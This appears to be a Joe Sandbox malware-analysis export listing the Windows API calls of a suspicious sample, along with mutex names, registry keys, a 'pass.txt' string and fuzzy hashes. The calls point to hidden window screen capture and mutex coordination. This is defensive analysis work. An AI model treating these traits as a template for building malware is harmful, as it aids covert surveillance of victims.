                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 012FCBAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FCBB9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FCBCD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FCBDF
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012FCBEE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FCBF5
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C0CB,BSS), ref: 012FCC0F
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 012FCC15
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                              • String ID: 61C5C0CB$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0Mw
                                                                                                                                                                                                              • API String ID: 3206501308-1030087416
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF88F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012EF892
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF89B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012EF89E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF8B1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012EF8B4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF8BD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012EF8C0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF8D3
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012EF8D6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF8DF
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012EF8E2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF8F5
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012EF8F8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EF901
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012EF904
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: 82d610fe459e67f6a0f40d1ccbaccd4730d38c84011e056bd7aec628ef9cd312
                                                                                                                                                                                                              • Instruction ID: 6fd95b55954714d542017463fae98329d5224d2440aefa83f1ce9cff239bc67d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82d610fe459e67f6a0f40d1ccbaccd4730d38c84011e056bd7aec628ef9cd312
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED112E35A40316B7EB30AABA8C4CF5B7FACEFC5B51F55401ABA0C97280DA30D500CAB0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindow.USER32(?,774D30D0,7707BCB0,774D3050), ref: 012EC96D
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 012EC97C
                                                                                                                                                                                                                • Part of subcall function 012EDCE0: GetClassNameA.USER32(?,?,00000101), ref: 012EDCF6
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 012EC9B9
                                                                                                                                                                                                              • GetClassLongA.USER32(?,000000E6), ref: 012EC9C2
                                                                                                                                                                                                              • PrintWindow.USER32(?,?,00000000), ref: 012EC9D5
                                                                                                                                                                                                              • RedrawWindow.USER32(?,00000000,00000000,00000485,?,?), ref: 012EC9FB
                                                                                                                                                                                                              • CreateRectRgn.GDI32(?,?,?,?), ref: 012ECA11
                                                                                                                                                                                                              • GetWindowRgn.USER32(?,00000000), ref: 012ECA1B
                                                                                                                                                                                                              • OffsetRgn.GDI32(00000000,?,?), ref: 012ECA35
                                                                                                                                                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 012ECA40
                                                                                                                                                                                                              • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 012ECA69
                                                                                                                                                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 012ECA72
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 012ECA75
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ClassClipRectSelect$CreateDeleteLongNameObjectOffsetPrintRedrawVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3597830993-0
                                                                                                                                                                                                              • Opcode ID: 3c3130ee372b0492f9f5d92fa8433ba165c977bcbc9292cf357248de82c45083
                                                                                                                                                                                                              • Instruction ID: b1051a0348c1f5c61e0393542f7c0f7676cfa3df5e4b0dda20fae30f93879f93
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c3130ee372b0492f9f5d92fa8433ba165c977bcbc9292cf357248de82c45083
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6315E71620105AFDB20EEA8DC89FBF7BBCEB45751F50411CFA01A2285D674A9018B64
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(000004E3,00000000,?,?,?,?), ref: 0130E265
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0130E281
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 0130E29B
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0130E2B1
                                                                                                                                                                                                              • wsprintfA.USER32(?,%02d/%02d/%04d %02d:%02d,?,?,?,?,?), ref: 0130E2DC
                                                                                                                                                                                                              • realloc.MSVCRT(00000000,?), ref: 0130E302
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0130E375
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,00000004,?,00000000,00000000), ref: 0130E40A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %02d/%02d/%04d %02d:%02d, xrefs: 0130E2D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleTime$ByteCharCloseCreateInformationMultiSystemWidefreereallocwsprintf
                                                                                                                                                                                                              • String ID: %02d/%02d/%04d %02d:%02d
                                                                                                                                                                                                              • API String ID: 3846129198-4051342895
                                                                                                                                                                                                              • Opcode ID: d8417089fb34234b048ffdc204e7afe82733ad224ec264afe24990db98589509
                                                                                                                                                                                                              • Instruction ID: 7cb7f031f97a0364459070e10f50dc868f4a1e03a93495647e9db38d6b2f0880
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8417089fb34234b048ffdc204e7afe82733ad224ec264afe24990db98589509
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F612A71A007099FDB21DF78DC54AEE7BF8EF49315F0046A9F94697281DB31A505CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01303E10
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01303E4D
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01303E62
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01303E6C
                                                                                                                                                                                                              • #680.SHELL32 ref: 01303E74
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01303E85
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01303E8C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01303F50,00000000,00000000,00000000,00000000,00000001), ref: 01303EF5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 01303F0D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01303F1E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashCreateErrorHandleLast$#680CloseDirectoryFolderInformationMakeSystemThread
                                                                                                                                                                                                              • String ID: pass.txt
                                                                                                                                                                                                              • API String ID: 1025529708-1961669250
                                                                                                                                                                                                              • Opcode ID: 138cb72a18c0fea1a8cacf712bac705fe99f87630432d759cc07d0a507194e7a
                                                                                                                                                                                                              • Instruction ID: 75976b48b6bdf0b8009486ffabd810f012feb945e695a1d4be690e0b95bda2f0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 138cb72a18c0fea1a8cacf712bac705fe99f87630432d759cc07d0a507194e7a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7341163160420A9FDB329F68D868BEA7BE8FF45304F044158FDC6D3281CB709A48CBA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01303E10
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01303E4D
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01303E62
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01303E6C
                                                                                                                                                                                                              • #680.SHELL32 ref: 01303E74
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01303E85
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01303E8C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01303F50,00000000,00000000,00000000,00000000,00000001), ref: 01303EF5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 01303F0D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01303F1E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashCreateErrorHandleLast$#680CloseDirectoryFolderInformationMakeSystemThread
                                                                                                                                                                                                              • String ID: pass.txt
                                                                                                                                                                                                              • API String ID: 1025529708-1961669250
                                                                                                                                                                                                              • Opcode ID: fd8e5d1f000a9b03093dd8410317a562f6ac2ea45a45208be7bee5c7c373ef77
                                                                                                                                                                                                              • Instruction ID: e580bc19e7ed201fe1f6b079f9b1db4f0d0bfbd63fb69f12311369685f4c1b52
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd8e5d1f000a9b03093dd8410317a562f6ac2ea45a45208be7bee5c7c373ef77
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0541E7355042459FDB329F68D868BEA7BE9FF45304F144148FD8AD7281CB709A44CBA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000FF,00000000), ref: 012E6CA1
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?,00000000,000000FF,00000000), ref: 012E6CBF
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 012E6CDB
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,9E2B3B9Fa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 012E6D02
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 012E6D7A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 012E6D81
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000110,?,?,?,?,?,00000000), ref: 012E6D95
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 012E6DAE
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 012E6DBC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: 9E2B3B9Fa$software\microsoft
                                                                                                                                                                                                              • API String ID: 217510255-2470003939
                                                                                                                                                                                                              • Opcode ID: 1b0d7164c13d2a89f8ee425b606a69028c7db9fe6bbaffa3cc8880b8a7705a5d
                                                                                                                                                                                                              • Instruction ID: 6af40be4a260fd1639950f360e4fd54c499f60aebddc494c1289f0c4ed0121e9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b0d7164c13d2a89f8ee425b606a69028c7db9fe6bbaffa3cc8880b8a7705a5d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1131F870E5122E66DB25EB68CC0DBEE7BACAF24704F80459CF649E2185D7B1468487E1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000FF,00000000), ref: 012E6B41
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?,00000000,000000FF,00000000), ref: 012E6B5F
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 012E6B7A
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(80000001,9E2B3B9Fa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 012E6BA1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 012E6C1A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 012E6C21
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000110,?,?,?,?,?,00000000), ref: 012E6C35
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 012E6C4E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 012E6C5C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: 9E2B3B9Fa$software\microsoft
                                                                                                                                                                                                              • API String ID: 217510255-2470003939
                                                                                                                                                                                                              • Opcode ID: e9b59f8d72bcc438522460272f57f2e3bc08806b6feecbc674c3acbf60035a40
                                                                                                                                                                                                              • Instruction ID: 14059193c6462e087941a32a5f57c3964f048f02fab5509a83117236a06509e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9b59f8d72bcc438522460272f57f2e3bc08806b6feecbc674c3acbf60035a40
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7331C870D512596AEB25EB64CC4DFEE7BB8EF24704F40859CE609E6181E7B487848BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EB843
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012EB870
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 012EB877
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 012EB889
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012EB898
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 012EB8A2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EB8B4
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012EB8E1
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 012EB8E8
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,?), ref: 012EB8FB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 2596333622-1167384825
                                                                                                                                                                                                              • Opcode ID: a5ea1bf3aa4d546da5a583458b643cd1c6a93cd0d87fe808a403113814d45e4b
                                                                                                                                                                                                              • Instruction ID: 14d81f77035f4c58ba116af7dffc36d6c6cce1088b4cde6c27d433b63b5630f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5ea1bf3aa4d546da5a583458b643cd1c6a93cd0d87fe808a403113814d45e4b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA21A172205214AFC730AF69E84DEEABBECEB59732F44817AF605D7295C7704541CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 0130440C
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 01304422
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 01304430
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 01304439
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 01304451
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01304463
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 0130446E
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,0133D19C,VEFK), ref: 01304488
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Mw$VEFK
                                                                                                                                                                                                              • API String ID: 849374196-4074141098
                                                                                                                                                                                                              • Opcode ID: 4074ef1ffb3d223af0f494f25896cfc01cb1d36065188ef1923752e51d283915
                                                                                                                                                                                                              • Instruction ID: a585fbb362cb1a713859d0d2c9883af45bdcb379d957743fd3b080753ed21146
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4074ef1ffb3d223af0f494f25896cfc01cb1d36065188ef1923752e51d283915
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A401D6366817152BD2327A6A9C06F9EB7CC9F46B18F014118FF44A62C1DBF0A60046AA
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 012FB91C
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FB925
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FB939
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FB94B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c09f), ref: 012FB956
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61c5c09f,ALPHA), ref: 012FB970
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 012FB976
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 61c5c09f$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Mw
                                                                                                                                                                                                              • API String ID: 4280258085-2790425520
                                                                                                                                                                                                              • Opcode ID: 3487607d7c6b1248b457ec7e9c2d8da7113cd82b44d53b549097a3f1e0cd9f12
                                                                                                                                                                                                              • Instruction ID: 8e990412519619733501fc21315de92393ffc5d2fe598122b54a3718137d84d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3487607d7c6b1248b457ec7e9c2d8da7113cd82b44d53b549097a3f1e0cd9f12
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BEF0F9305A93167AE6317B658C0AF5AB69CAB05B14F00401CF701A13C5C7E0A6049BB6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 013032DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013032E5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 013032F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0130330B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435), ref: 01303316
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C435,RFK), ref: 01303330
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 01303336
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 61C5C435$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Mw$RFK
                                                                                                                                                                                                              • API String ID: 4280258085-2898694334
                                                                                                                                                                                                              • Opcode ID: 0258e69f3f0e8069f1996b037d3d244aa65e7dc31f73c662ca012af580c7934a
                                                                                                                                                                                                              • Instruction ID: 138ae3e47ac7bd222f431fb104b80b9c9da8faa39f719ae95e6a90f7631b2538
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0258e69f3f0e8069f1996b037d3d244aa65e7dc31f73c662ca012af580c7934a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F0F4306863056ED2327B569C1AF9ABBDC7B05B19F00801CF744A22C1CBE0A5008BBA
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 012FCBAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FCBB9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FCBCD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FCBDF
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012FCBEE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FCBF5
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C0CB,BSS), ref: 012FCC0F
